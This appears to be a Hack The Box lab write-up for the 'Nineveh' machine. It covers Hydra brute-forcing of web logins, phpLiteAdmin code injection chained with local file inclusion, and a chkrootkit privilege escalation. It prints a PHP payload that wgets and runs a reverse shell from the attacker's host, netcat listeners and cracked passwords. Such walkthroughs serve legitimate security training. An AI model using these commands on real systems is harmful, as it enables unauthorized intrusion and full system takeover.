HTB - Nineveh

Linux | Hydra | LFI | chkrootkit

Tools For This Room

  • Hydra - is a logon brute-forcing cracker - learn more about it on Kali tools - example of its syntax on Infinite Logins

  • LFI (Local File Inclusion) - a quick summary of what an LFI is

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold by brute-forcing with hydra

  3. Privesc by exploiting chkrootkit

Scanning & Enumeration

Let's start things off with our customary nmap scan:

  • nmap

nmap -sV -sC -vv <IP>

We get 2 open ports: 80: HTTP 443: HTTPS

Let's check out port80. We only get this page:

Next up is port443. Since it's HTTPS, we need to add an "s" behind "http". We encounter a self-signed certificate warning which we can safely ignore:

We get to this page after accepting the risks:

Since we don't get much from either of these, let's move on to gobuster

  • gobuster

gobuster dir -u http://<IP>:80 -w <wordlist>
gobuster dir -u https://<IP>:443 -w <wordlist> -k

We'll add the "s" for 443's scan, and throw in the "-k" flag to bypass the self-signed certificate. We can also run the gobuster scan with a few wordlists for better enumeration. In this instance, let's use dirb's common.txt and directory-list-small.txt.

Port80 has a few interesting directories. Firstly, /info-php gives us version information, and /department provides a login page.

/info-php
/department

Viewing the source for /department also gives us a little tidbit:

Let's see what port443's gobuster scan yielded. We get just one interesting directory: /db.

/db

It handily provides a version number too, so we can search for an exploit later.

Gaining Foothold

But first, let's return to the login page we found on port80. After trying the usual suspects of admin/password, admin/nineveh, etc, we'll try to use Hydra to crack the login with brute-force.

However, to correctly set up the Hydra scan, we'll need to get some info from the page itself. The syntax for Hydra is as follows:

hydra <UsernameList> <PasswordList> <IP> <method> "<path>:<RequestBody>:<IncorrectVerbiage>"

The username and password lists are self-explanatory. But we need to get the Method, Path, and Request Body.

The Method is how the form submits the credentials. To get this, we right-click and select "Inspect Element (Q)", then move to the "Network" tab. Then we submit the form, and see that the "Post" method is used to log in. As such, we'll use the "http-post-form" method.

The Path is simply the URL after the IP. In this case, it's "/department/login.php".

The Request Body can be found in the previously opened "Inspect Element (Q)". We need to select the file "login.php", then click the "Resend" button in the far right corner, and select the "Edit and Resend" option from the dropdown menu. We get the Request Body "username=amrois&password=password".

Lastly, the Incorrect Verbiage can be found on the login page when the wrong password is entered. In our case, it's "Invalid Password".

Check out Infinite Logins' crystal clear Hydra explanation here.

Now that we have all the parameters, let's put them together.

hydra -v -l admin -P <passwordlist> <IP> http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"

We can get a snack while Hydra works its magic, and we get the password: 1q2w3e4r5t

Let's repeat this for the login page on port443, with the addition of "s" in "https-post-form".

hydra -v -l admin -P ./rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect Password"

We can do some crunches while Hydra also crunches the list, and we get: password123

Logging into the page on port80, we check out the Notes section. An interesting point to note is the URL looks like a file path with "files/ninevehNotes.txt". This could be a potential LFI (Local File Inclusion) vulnerability, and we may need to use this later. Additionally, the text mentions a secret folder which we should keep an eye out for.

Checking out the page on port443, we find the phpLiteAdmin homepage. A quick searchsploit check gives us an exploit for Remote PHP Code Injection.

First, let's create a reverse shell file on our attacking machine with our IP and chosen port. Pentestmonkey's will work fine. Then we set up an HTTP server:

python -m SimpleHTTPServer

Next we create a database called ninevehNotes.php. Our initial attempt using hack.php didn't quite work. Then we create a new table within this database called ninevehNotes.php with 1 field. We change the Type from integer to text. In the Field and Default Value sections, we put in a php command which will get the reverse shell from our machine.

<?php system("wget http://<ourIP>:<port>/<reverseshell> -O /tmp/shell.php; php /tmp/shell.php"); ?>

Now when we exploit the LFI from earlier, we'll trigger the command above and get a reverse shell. But first, we set up a netcat listener.

nc -lvnp <port>

Browsing to the following URL to execute the LFI:

http://<IP>:80/department/manage.php?notes=/var/tmp/ninevehNotes.php

We get our initial foothold.

Let's upgrade our shell so we've an easier time navigating. A quick check shows us that it's running python3, so we'll change our commands accordingly.

which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
// ctrl + z //
stty raw -echo && fg
export TERM=xterm

Privilege Escalation

Poking around we find only one folder which belongs to amrois, so let's check it out.

Checking it out shows us a bunch of reports which are likely generated every minute.

Looking at the report's contents, we can see that it's scanning for malicious files. It could be an anti-virus or something along those lines.

Pasting some of the text above into Google provides us an answer to our mystery file. Chkrootkit is a program which scans for known rootkits.

A quick searchsploit check shows us how to privesc with this.

First, we create a reverse shell file called update on our attacking machine, and change the necessary IP and port in the file. Pentestmonkey's reverse shell is perfect for this. We also create a netcat listener.

nc -lvnp <port>

Now move into the /tmp directory on our victim machine, and wget the reverse shell file.

wget <ourIP>:<port>/update

Let's make the update file executable, so that chkrootkit can run it.

Now as the exploit mentioned, we just wait for chkrootkit to run again, and we get our shell.

Picking up the user.txt and root.txt and wrapping it up!

PreviousHTB - CronosNextHTB - Sense

Last updated

Was this helpful?